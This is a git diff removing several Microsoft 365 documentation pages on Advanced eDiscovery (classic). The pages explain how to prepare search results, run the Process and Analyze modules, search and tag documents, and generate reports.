-- You have to be an eDiscovery Manager or an eDiscovery Administrator in the Security & Compliance Center to prepare search results for Advanced eDiscovery. An eDiscovery Manager is a member of the eDiscovery Manager role group. An eDiscovery Administrator is also member of the eDiscovery Manager role group, but has been assigned additional eDiscovery privileges. For instructions about assigning eDiscovery Administrator permissions, see Step 1 in [eDiscovery cases](ediscovery-cases.md#step-1-assign-ediscovery-permissions-to-potential-case-members).
-
-## Step 1: Prepare search results for Advanced eDiscovery
-
-You can prepare the results of a search that's associated with an eDiscovery case. When you prepare search results for Advanced eDiscovery, the data is uploaded and temporarily stored in a unique Windows Azure storage area in the Microsoft cloud. It's at this point that the OCR functionality extracts text from images in the search results. In [Step 2](#step-2-add-the-search-results-data-to-the-case-in-advanced-ediscovery), this text and the other search results data is loaded in to the case in Advanced eDiscovery.
-
-1. In the Security & Compliance Center, click **eDiscovery** \> **eDiscovery** to display the list of cases in your organization.
-
-2. Click **Open** next to the case that you want to prepare search results for analysis in Advanced eDiscovery.
-
-3. On the **Home** page for the case, click **Search**, and then select the search.
-
-4. In the details pane, under **Analyze results with Advanced eDiscovery**, click **Prepare results for analysis**.
-
- > [!NOTE]
- > If the search results are older than 7 days, you will be prompted to update the search results.
-
-5. On the **Prepare results for analysis** page, do the following:
-
- - Choose to prepare indexed items, indexed and unindexed items, or only unindexed items for analysis in Advanced eDiscovery.
-
- - Choose whether to include all versions of documents found on SharePoint that met the search criteria. This option appears only if the content sources for the search includes sites.
-
- - Specify whether you want a notification message sent (or copied) to a person when the preparation process is completed and the data is ready to be processed in Advanced eDiscovery.
-
-6. Click **Prepare**.
-
- The search results are prepared for analysis with Advanced eDiscovery.
-
-7. In the details pane, click **Check preparation status** to display information about the preparation process. When the preparation process is finished, you can go to the case in Advanced eDiscovery to process the data for analysis.
-
-## Step 2: Add the search results data to the case in Advanced eDiscovery
-<a name="step2"> </a>
-
-When the preparation is finished, the next step is to go to Advanced eDiscovery and load the search results data (which have been uploaded to an Azure storage area in the Microsoft cloud ) to the case in Advanced eDiscovery. As previously explained, to access Advanced eDiscovery you have to be an eDiscovery Administrator in the Security & Compliance Center or an administrator in Advanced eDiscovery.
-
-> [!NOTE]
-> The time it takes for the data from the Security & Compliance Center to be available to add to a case in Advanced eDiscovery varies, depending on the size of the results from the eDiscovery search.
-
-1. In the Security & Compliance Center, click **eDiscovery** \> **eDiscovery** to display the list of cases in your organization.
-
-2. Click **Open** next to the case that you want to load data in to in Advanced eDiscovery.
-
-3. On the **Home** page for the case, click **Switch to Advanced eDiscovery**.
-
- ![Click Switch to Advanced eDiscovery to open the case in Advanced eDiscovery](../media/8e34ba23-62e3-4e68-a530-b6ece39b54be.png)
-
- The **Connecting to Advanced eDiscovery** progress bar is displayed. When you're connected to Advanced eDiscovery, a list of containers is displayed on the setup page for the case.
-
- ![The case is displayed in Advanced eDiscovery](../media/8036e152-70dc-4bb7-9379-61c1ed8326b4.png)
-
- These containers represent the search results that you prepared for analysis in Advanced eDiscovery in Step 1. Note that the name of the container has the same name as the search in the case in the Security & Compliance Center. The containers in the list are the ones that you prepared. If a different user prepared search results for Advanced eDiscovery, the corresponding containers won't be included in the list.
-
-4. To load the search result data from a container in to the case in Advanced eDiscovery, select a container and then click **Process**.
-
-## Next steps
-
-After the results of an eDiscovery search are added to a case, the next step is to use the Advanced eDiscovery tools to analyze the data and identify the content that's responsive to a specific legal case. For information about using Advanced eDiscovery, see [Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md).
-
-## More information
-
-Any RMS-encrypted email messages that are included in the search results will be decrypted when you prepare them for analysis in Advanced eDiscovery. This decryption capability is enabled by default for members of the eDiscovery Manager role group. This is because the RMS Decrypt management role is assigned to this role group. Keep the following things in mind about decrypting email messages:
-
-- Currently, this decryption capability doesn't include encrypted content from SharePoint and OneDrive for Business sites. Only RMS-encrypted email messages will be decrypted when you export them.
-
-- If an RMS-encrypted email message has an attachment (such as a document or another email message) that's also encrypted, only the top-level email message will be decrypted.
-
-- If you need to prevent someone from decrypting RMS-encrypted messages when preparing search results for analysis in Advanced eDiscovery, you'll have to create a custom role group (by copying the built-in eDiscovery Manager role group) and then remove the RMS Decrypt management role from the custom role group. Then add the person who you don't want to decrypt messages as a member of the custom role group.
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/quick-setup-for-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/quick-setup-for-advanced-ediscovery.md deleted file mode 100644
@@ -1,75 +0,0 @@
-title: "Quick setup for Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Priority
-search.appverid:
-- MOE150-- MET150
-ms.assetid: d7ccd944-9698-41c7-a21b-677dc62973c4
-description: "Learn how to access Advanced eDiscovery from the Security &amp; Compliance Center and review the typical workflow for using Advanced eDiscovery."
-
-# Quick setup Advanced eDiscovery (classic)
-
-> [!IMPORTANT]
-> As we continue to invest in newer versions of Advanced eDiscovery, we are announcing the retirement of Advanced eDiscovery, also known as *Advanced eDiscovery (classic)* or *Advanced eDiscovery v1.0*. If you're still using Advanced eDiscovery v1.0, please transition to [Advanced eDiscovery v2.0](overview-ediscovery-20.md) (also known as the *Advanced eDiscovery solution in Microsoft 365*) as soon as possible. Advanced eDiscovery 2.0 contains similar functionality found in Advanced eDiscovery v1.0, but also offers many new features such as custodian management, communications management, and review sets. To learn more about the retirement of Advanced eDiscovery v1.0, see [Retirement of legacy eDiscovery tools](legacy-ediscovery-retirement.md#advanced-ediscovery-v10).
-
-This setup section shows an Microsoft 365 Security &amp; Compliance Center eDiscovery manager how to get started with Advanced eDiscovery. A working knowledge of both is assumed.
-
-## Accessing a case in Advanced eDiscovery
-
-You access Advanced eDiscovery from the Security &amp; Compliance Center. You have to be a member of an eDiscovery case in the Security &amp; Compliance Center to access the case in Advanced eDiscovery. For instructions about assigning eDiscovery case permissions and adding users to an eDiscovery case, see [Manage eDiscovery cases in Office 365](ediscovery-cases.md).
-
-To go to a case in Advanced eDiscovery:
-
-1. [Go to the Security &amp; Compliance Center](go-to-the-securitycompliance-center.md) .
-
-2. In the Security &amp; Compliance Center, click **Search &amp; investigation** \> **eDiscovery** to display the list of cases in your organization.
-
-3. On the **eDiscovery** page, click **Open** next to the case that you want to go to in Advanced eDiscovery.
-
-4. On the **Home** page for the case, click **Switch to Advanced eDiscovery**.
-
- The **Connecting to Advanced eDiscovery** progress bar is displayed. When you're connected, the case is opened in Advanced eDiscovery.
-
-## Workflow
-
-The following diagram illustrates the common workflow for managing and using eDiscovery cases in the Security &amp; Compliance Center and Advanced eDiscovery.
-
-![Diagram shows the Advanced eDiscovery workflow of four phases in setup, including setting up users &amp; cases, identifying case data, exporting, and processing, and then the phases of analysis and export to local machine.](../media/76589ccc-789d-4581-b3a8-98d339b05979.png)
-
-This setup section describes the first four steps in the workflow. For a description of the other steps in the workflow, see the following.
-
-## Analyze
-
-[Analyzing case data](analyze-case-data-with-advanced-ediscovery.md) Identifies and organizes the files by various parameters, enables the use of Themes, and displays the results. Analyze functionality can be customized by the user in order to achieve enhanced results.
-
-## Relevance Setup and Relevance
-
-[Relevance Setup](manage-relevance-setup-in-advanced-ediscovery.md) and [Using the Relevance module](use-relevance-in-advanced-ediscovery.md) Enables assessment and relevance training based on a random sample of files and uses them to apply decisions to the predictive coding process. Calculates and displays interim results while monitoring statistical validity of the process. Displays the results to facilitate in making review decisions.
-
-## Export
-
-[Exporting case data](export-case-data-in-advanced-ediscovery.md) Enables the exporting of Advanced eDiscovery content and results for external review.
-
-## Report
-
-[Running reports](run-reports-in-advanced-ediscovery.md) Enables the generation of selected reports related to Advanced eDiscovery processing.
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Setting up users and cases](set-up-users-and-cases-in-advanced-ediscovery.md)
-
-[Preparing data](prepare-data-for-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/run-reports-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/run-reports-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,43 +0,0 @@
-title: "Run reports in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: b270243e-99a0-4c34-9b21-acb1512d56c6
-description: Learn how to run a report for your selected process and then download its .csv file in Advanced eDiscovery.
-ms.custom: seo-marvel-apr2020
-
-# Run reports in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-This topic describes how to run reports in Advanced eDiscovery.
-
-## Running reports
-
-You can download a .csv file with a report for the selected process.
-
-1. In the **Reports** tab, select an option from the **Report name** list. Select from three **Report name** options: **Relevance decide**, **Themes list,** or **Tagged files**.
-
- ![eDiscovery Analytics Reports](../media/f16aee7a-508f-4acc-99bc-a2c8dec01312.png)
-
-2. Available parameters, and sort and filter options can be set, depending on the selected report.
-
-3. Click **Download CSV**. The requested report is generated and downloaded.
-
-## Related topics
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/run-the-process-module-and-load-data-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/run-the-process-module-and-load-data-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,85 +0,0 @@
-title: "Run the Process module and load data in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: c87bb0e5-301c-4d1d-958e-aabeb7990f44
-description: "Learn how to use the Security &amp; Compliance Center to access Advanced eDiscovery and run the Process module for a case."
-ms.custom: seo-marvel-apr2020
-
-# Run the Process module and load data in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-This section describes the functionality of the Advanced eDiscovery Process module.
-
-In addition to file data, metadata such as file type, extension, location or path, creation date and time, author, custodian, and subject, can be loaded into Advanced eDiscovery and saved for each case. Some metadata is calculated by Advanced eDiscovery, for example, when native files are loaded.
-
-Advanced eDiscovery provides system metadata values, such as Near-duplicate groupings or Relevance scores. Other metadata, such as file annotations, can be added by the Administrator.
-
-## Running Process
-
-> [!NOTE]
-> Batch numbers are assigned to a file during Process to allow the tracking of files. The batch number also enables identification of Process batches for reprocessing options. Additional filters are available for filtering by batch number and sessions.
-
-Perform the following steps to run Process.
-
-1. [Open the Security &amp; Compliance Center](go-to-the-securitycompliance-center.md) .
-
-2. Go to **Search &amp; investigation** \> **eDiscovery** and then click **Go to Advanced eDiscovery**.
-
-3. In Advanced eDiscovery, select the appropriate case in the displayed **Cases** page and click **Go to case**.
-
-4. In **Prepare** \> **Process** \> **Setup**, select a container from the list of available containers.
-
- ![Click Process to add the search results to the case](../media/50bdc55c-d378-4881-b302-31ef785fa359.png)
-
-5. Click **Advanced settings...** if you want to add the container as seed files or as pre-tagged files.
-
- Use seed files to accelerate training for issues with low richness (usually 2%, or less). For seed files, it is recommended that you select a variety of distinctly relevant files and process about 20-50 seeds per issue (too many seed files can skew Relevance results). Seed files should be reviewed by the same person who will train the issue.
-
- Use pre-tagged files to automate Relevance training. You should tag at least 1,500 files, and keep the proportion of relevant to non-relevant files the same as in the collection added to Relevance. These files should be manually tagged, and you should be confident in the quality of tagging.
-
- ![Screenshot of Advanced settings page for processing batch files](../media/3c25cb78-4484-41e5-bd34-3753c7ab6cf2.jpg)
-
- - In the **Seed** section:
-
- Choose **Mark as seed files** to mark the container as seed files. You also need choose to assign them per issue from the **For issue** drop-down. Choose either **Relevant** or **Not relevant** from the **Tag** drop-down.
-
- > [!NOTE]
- > Once you set files as **Seed**, you cannot mark them as **Pre-tagged**.
-
- - In the **Pre-tagged files** section:
-
- Choose **Mark as pre-tagged files** to mark the container as pre-tagged files. You also need to assign them per issue from the **For issue** drop-down. Choose either **Relevant** or **Not relevant** from the **Tag** drop-down.
-
- > [!NOTE]
- > Once you set files as **Pre-tagged**, you cannot mark them as **Seed**.
-
- - In the **Email tagging** section. set which part of a processed email are to be marked as Seed or Pre-tagged.
-
-6. To begin, click **Process**. When completed, the Process results are displayed.
-
-7. (Optional) If you need to assign data sources to a specific custodian, you can add and edit custodian names in **Custodians** \> **Manage** and assign custodians in **Custodians** \> **Assign**.
-
-If you add to the case, then you can process again.
-
-## Related topics
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Viewing Process module results](view-process-module-results-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/run-the-process-module-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/run-the-process-module-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,77 +0,0 @@
-title: "Run the Process module in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: dbc1e251-0596-443b-ac9b-f398ba955b73
-description: "Learn the guidelines for preparing case files of data for analysis with Advanced eDiscovery."
-
-# Run the Process module in Advanced eDiscovery (classic)
-
-Case files are loaded into the Advanced eDiscovery during **Prepare** \> **Process**.
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-## Guidelines: Preparing data for Advanced eDiscovery
--- **Quality**: Clearly identify the case file population pertinent to the case.
-
-- **Loads**: Load the files into a location that is accessible to Advanced eDiscovery.
-
-- **File ID**: A unique file identifier in Advanced eDiscovery. If no file identifier is imported, Advanced eDiscovery automatically generates the ID. If you map the ID in a subsequent Process load, and map a different path than in the initial Process load, Advanced eDiscovery will replace the path (rather than add a new file entry). The ID can be used as a reference in the Export process. The ID value should not be "-1".
-
-- **MD5**: This signature is used to differentiate between files (two files are not considered exact duplicates unless they have the same MD5). By default, Advanced eDiscovery calculates the MD5 of files. When the loaded files are text files, it is recommended to load and map the original MD5 value instead of calculating it in Advanced eDiscovery.
-
-- **File type and name**:
-
- - Advanced eDiscovery can process files of various formats and extract loaded native files into a standard format, such as \*.TXT, HTML, or .XML. Processing of text files is faster than native files. Extracted text files are stored in the case folder.
-
- - Do not load files that cannot be extracted, such as system files or graphic images. These files may delay processing.
-
- - Verify that file names are significantly named and paths are correct.
-
-- **File path**: Advanced eDiscovery can load files with path lengths up to 400 characters.
-
-- **Text extraction**: When extracting text from native files, in addition to normal text, the following are also extracted: hidden text (Excel and .doc), hidden columns (Excel), track changes (.doc), speaker notes (.ppt), embedded objects (for example, Excel objects in a .ppt). These can be viewed in the Text editor.
-
-- **Ignore Text**: This optional feature is defined after Process is run and before Analyze. Ignore text should be used with caution because its use may reduce the performance of file analysis.
-
-- **Multilingual text**: Advanced eDiscovery does not currently handle multilingual names for tags, custodian, and issues.
-
-- **Metadata**: Determine if there is metadata that you want to save in the case database for future reference, such as date range, file size, file type, custodian, and subject. Metadata can be loaded after files were already loaded without rerunning the inventory or adding reprocessing overhead.
-
- - If the files were originally loaded by path, map the path column when later importing metadata. It is possible to refer to the file by ID and to map a different path. This is a useful scenario when the file paths change.
-
- - If the files were originally loaded by File ID, map the ID column when loading metadata. Referring to the file by path (instead of ID) will cause files to be re-loaded with a different ID. Advanced eDiscovery creates copies of the files rather that loading metadata of the existing files.
-
-- **Families**: It is not possible to load a family without its parent (head of family).
-
-- **File size**: There is no limitation on the size of files loaded to Advanced eDiscovery. For analysis (Analyze, Relevance, etc.), the limit is 5,242,880 characters of extracted text. Larger files are ignored (for example, in Relevance, files do not participate in the Relevance training process and do not receive a Relevance score after batch calculation).
-
-- **File quantity**: There is no recommended limit on the number of files that can be handled in a single case. Performance depends on the resources of your system.
-
-## Filtering files
-
-A user-defined label can be associated with a set of files to exclude them from Process or other tasks. Each Process session is associated with a batch ID. Although the batch ID is not visible to the expert in Relevance, this can be done using a search utility, by adding a filter for the current batch and tagging all appropriate files with a user-defined label.
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Running the Process module and loading data](run-the-process-module-and-load-data-in-advanced-ediscovery.md)
-
-[Viewing Process module results](view-process-module-results-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/search-and-tagging https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/search-and-tagging.md deleted file mode 100644
@@ -1,87 +0,0 @@
-title: "Search and Tagging"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-audience: ITPro
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MET150
-ms.assetid: 22f5adad-1bc0-460d-94a9-8732929f5b99
-description: "In Advanced eDiscovery, the Search and Tagging module enables you to search, preview, and organize the documents in your case. Currently, this module is in beta."
-ms.custom: seo-marvel-apr2020
-
-# Search and Tagging
-
-In Advanced eDiscovery, the Search and Tagging module enables you to search, preview, and organize the documents in your case. Currently, this module is in beta. For a brief demonstration of searching and tagging, see the [Manage your data with Advanced eDiscovery](https://www.youtube.com/watch?v=VaPYL3DHP6I) video.
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-## Search the documents in your case
-
-After you have processed documents in an Advanced eDiscovery case (and optionally run the Analyze or Relevance module), you can use the Search and Tagging to search documents and then organize them by applying case-specific tags (also called labels). You can define a search query using the provided condition cards or by using a KQL-like query language in the Keywords condition card. Common KQL syntax, such as AND, OR, NOT, and NEAR(n) are supported, as well as trailing multi-character wildcard (*).
-
-The following table lists the properties that you can search for using a KQL keyword query. Alternatively, you can use a condition card for in the Advanced eDiscovery Search tool to add a condition (for selected properties) to a search query.
-
-|**Property**|**Description**|
-|:-----|:-----|
-|**caselabel** <br/> | The name of the tag created/applied when a document is tagged. <br/> |
-|**custodian** <br/> | The custodian associated with a document; subject to limitations. <br/> |
-|**date** <br/> | Sent date for email; the modified date for site documents. <br/> |
-|**fileid** <br/> | The File ID within the case. <br/> |
-|**filetype** <br/> | The native file extension. <br/> |
-|**fileclass** <br/> | Email, document, or attachment. <br/> |
-|**senderauthor** <br/> | The sender for email; the author for site documents. <br/> |
-|**size** <br/> | The size of the file in KB. <br/> |
-|**subjecttitle** <br/> | The subject for email; the title for site documents. <br/> |
-|**bcc** <br/> | The Bcc field of an email. <br/> |
-|**cc** <br/> | The Cc field of an email. <br/> |
-|**participants** <br/> | The email address of all participants in an email thread, including for missing links. <br/> |
-|**received** <br/> | The date an email was received. <br/> |
-|**recipients** <br/> | Recipients of an email, included on the To, Cc, or Bcc fields. <br/> |
-|**sender** <br/> | The sender of an email. <br/> |
-|**lastmodifieddate** <br/> | The last modified date of a site document. <br/> |
-|**sent** <br/> | The sent date of an email. <br/> |
-|**to** <br/> | The recipient listed in the To field of an email. <br/> |
-|**author** <br/> | The author of a site document. <br/> |
-|**title** <br/> | The title of a site document. <br/> |
-|**dominanttheme**\* <br/> | The dominant theme of an item. <br/> |
-|**themeslist**\* <br/> | Themes that are associated with an item. <br/> |
-|**readpercentile_[issuenum]**\*\* <br/> | The read percentile of an item, for the issue defined by [issuenum]. <br/> |
-|**relevancescore_[issuenum]**\*\* <br/> | The relevance score of an item, for the issue defined by [issuenum]. <br/> |
-|**relevancetag_[tagname]**\*\* <br/> | If an item has been manually tagged for relevance, the tag defined by [tagname]. <br/> |
-|||
-
-\* Only available if the Themes module has been run.
-
-\*\* Only available if the Relevance module has been run.
-
-Alternatively, you can use a condition card in the Advanced eDiscovery Search tool to add a condition (for selected properties) to a search query. The following screenshot shows the conditions that can be added to a query. The **Group** column indicates whether the property applies to email, site documents, or both (indicated by the value *Common*). This column also identifies the searchable properties that are available after you run the Relevance module.
-
-![Search conditions in the Advanced eDiscovery search tool](../media/AeDSearchConditions.png)
-
-For more information about searchable properties, see [Keyword queries and search conditions](keyword-queries-and-search-conditions.md).
-
-## Related topics
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Understanding Assessment in Relevance](assessment-in-relevance-in-advanced-ediscovery.md)
-
-[Tagging and Assessment](tagging-and-assessment-in-advanced-ediscovery.md)
-
-[Tagging and Relevance training](tagging-and-relevance-training-in-advanced-ediscovery.md)
-
-[Tracking Relevance analysis](track-relevance-analysis-in-advanced-ediscovery.md)
-
-[Deciding based on the results](decision-based-on-the-results-in-advanced-ediscovery.md)
-
-[Testing Relevance analysis](test-relevance-analysis-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/set-analyze-advanced-settings-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/set-analyze-advanced-settings-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,56 +0,0 @@
-title: "Set Analyze advanced settings in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: a797682f-ad85-4c08-a354-3850ba2237ee
-description: "Learn how to configure advanced settings, including near-duplicates, email threads, and themes, for the Analyze process in Advanced eDiscovery."
-ms.custom: seo-marvel-apr2020
-
-# Set Analyze advanced settings in Advanced eDiscovery
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-Advanced eDiscovery provides default advanced parameters for Analyze module settings. The following procedure describes settings that can be specified.
-
-1. In the **Prepare \> Analyze \> Setup** tab, click **Advanced settings** (at the bottom of the page). The following panel is displayed.
-
- ![Set Analyze advanced settings](../media/c9ea3017-e19a-456b-a742-c3d07121a3f6.png)
-
-2. In **Near-duplicates and Email threads parameters**, select values for the following as necessary:
-
- - **Minimum number of words**: Minimum number for words, below which a file is not submitted for Near-duplicate analysis.
-
- - **Maximum number of words**: Maximum number for words, above which a file is not submitted for Near-duplicate analysis.
-
- - **Email similarity**: Minimal level of resemblance for two emails to be considered similar. Value is always equal to, or larger than document similarity. Default is 90%.
-
-3. In **Themes parameters**, select the **Include numbers in theme analysis** check box to include numbers in the processing of Themes during Analyze.
-
-4. Click **Save**.
-
-## Related topics
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Understanding document similarity](understand-document-similarity-in-advanced-ediscovery.md)
-
-[Setting Analyze options](set-analyze-options-in-advanced-ediscovery.md)
-
-[Setting ignore text](set-ignore-text-in-advanced-ediscovery.md)
-
-[Viewing Analyze results](view-analyze-results-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/set-analyze-options-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/set-analyze-options-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,86 +0,0 @@
-title: "Set Analyze options in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: f6cd6588-f6b6-424a-a9ab-3782b842faee
-description: "Review the steps to set up options for the Analyze process in Advanced eDiscovery, including near-duplicates, email threads, and themes."
-ms.custom: seo-marvel-apr2020
-
-# Set Analyze options in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-In Advanced eDiscovery, set the Analyze options prior to running Analyze.
-
-## Set Analyze options
-
-Open **Prepare \> Analyze** \> **Setup**. The following window is displayed.
-
-![Set Analyze Options](../media/c3ec7a92-8484-4812-b98c-aa3eb740e5b7.png)
-
- **Near-duplicates and email threads** Check this box if you want to run the analysis. It is selected by default.
-
- **Document similarity** Enter the Near-duplicates threshold value or accept the default of 65%.
-
- **Themes**Check this box to process all files and assign themes to them. By default, this check box is not selected. Enter the following options if you want to perform Themes processing.
-
-- **Max number of themes**Enter or select a value for the number of themes to create. The default is 200.
-
- > [!NOTE]
- > Increasing the number of themes affects performance, as well as the ability of a theme to generalize. The higher the number of themes, the more granular they are. For example, if a set of 50 themes include a theme such as "Basketball, Spurs, Clippers, Lakers"; 300 themes may include separate themes: "Spurs", "Clippers", "Lakers". If you had no awareness of the theme "Basketball" and use this feature for ECA, seeing the theme "Basketball" could be useful. But, if the processing had too many themes, you may never see the word "Basketball" and may not know that Spurs and Clippers are good Basketball themes to review, rather than items that go on boots and used for hair.
-
-- **Suggested themes** You can suggest theme words to control Themes processing. Advanced eDiscovery will focus on these suggested words and try to create one or more relevant themes, based on the "Max number of themes" settings.
-
- For example, if the suggested word is "computer", and you specified "2" as the "Max number of Themes", Advanced eDiscovery will try to generate two themes that relate to the word "computer". The two themes might be "computer software" and "computer hardware", for example.
-
- ![Add suggested theme](../media/06e9ffd3-a76c-423b-b450-9e465eb9a02f.png)
-
-1. To view, add, or edit suggested themes, click **Modify**.
-
-2. In the **Suggested themes** panel, click the **Add** ![add icon](../media/c2dd8b3a-5a22-412c-a7fa-143f5b2b5612.png) icon to add a theme. In the **Add suggested theme** panel, add the words, separated by commas.
-
-3. In **Number of themes**, select a value to determine the number of themes Advanced eDiscovery will try to generate for these words (default is 1 theme).
-
-4. Click **Save** and then close the dialogue.
-
- > [!NOTE]
- > The total number of themes includes Suggested Themes. The total Suggested Themes cannot exceed the total themes. If there are many Suggested Themes relative to the total themes, only a few "novel" themes will be detected by the system because most of the themes will be dedicated to Suggested Themes.
-
-- **Mode** From the drop-down list, select a **Themes** option:
-
- - **Create and apply model**: Calculates themes by models from a segment of the files and then distributes files among them.
-
- - **Create model**: Calculates a themes model from a segment of the files. The Apply process of dividing files is done separately at another time.
-
- - **Apply model**: This option is only shown if a model was created previously and not yet applied. This will divide the files based on the themes.
-
-You can also [set ignore text](set-ignore-text-in-advanced-ediscovery.md) and [set Analyze advanced settings](set-analyze-advanced-settings-in-advanced-ediscovery.md) for Analyze.
-
-After you've set these options, click **Analyze** to run. [View Analyze results](view-analyze-results-in-advanced-ediscovery.md) are displayed.
-
-## Related topics
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Understanding document similarity](understand-document-similarity-in-advanced-ediscovery.md)
-
-[Set Ignore text ](set-ignore-text-in-advanced-ediscovery.md)
-
-[Set Analyze advanced settings](set-analyze-advanced-settings-in-advanced-ediscovery.md)
-
-[View Analyze results](view-analyze-results-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/set-ignore-text-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/set-ignore-text-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,132 +0,0 @@
-title: "Set Ignore Text option for Analyze in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: conceptual
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 44055727-56e8-42d7-9dc3-fb942f3901cc
-description: "Learn how to define the rule to ignore specific text when using the Analyze and Process modules in Advanced eDiscovery."
-
-# Set Ignore Text option for Analyze in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
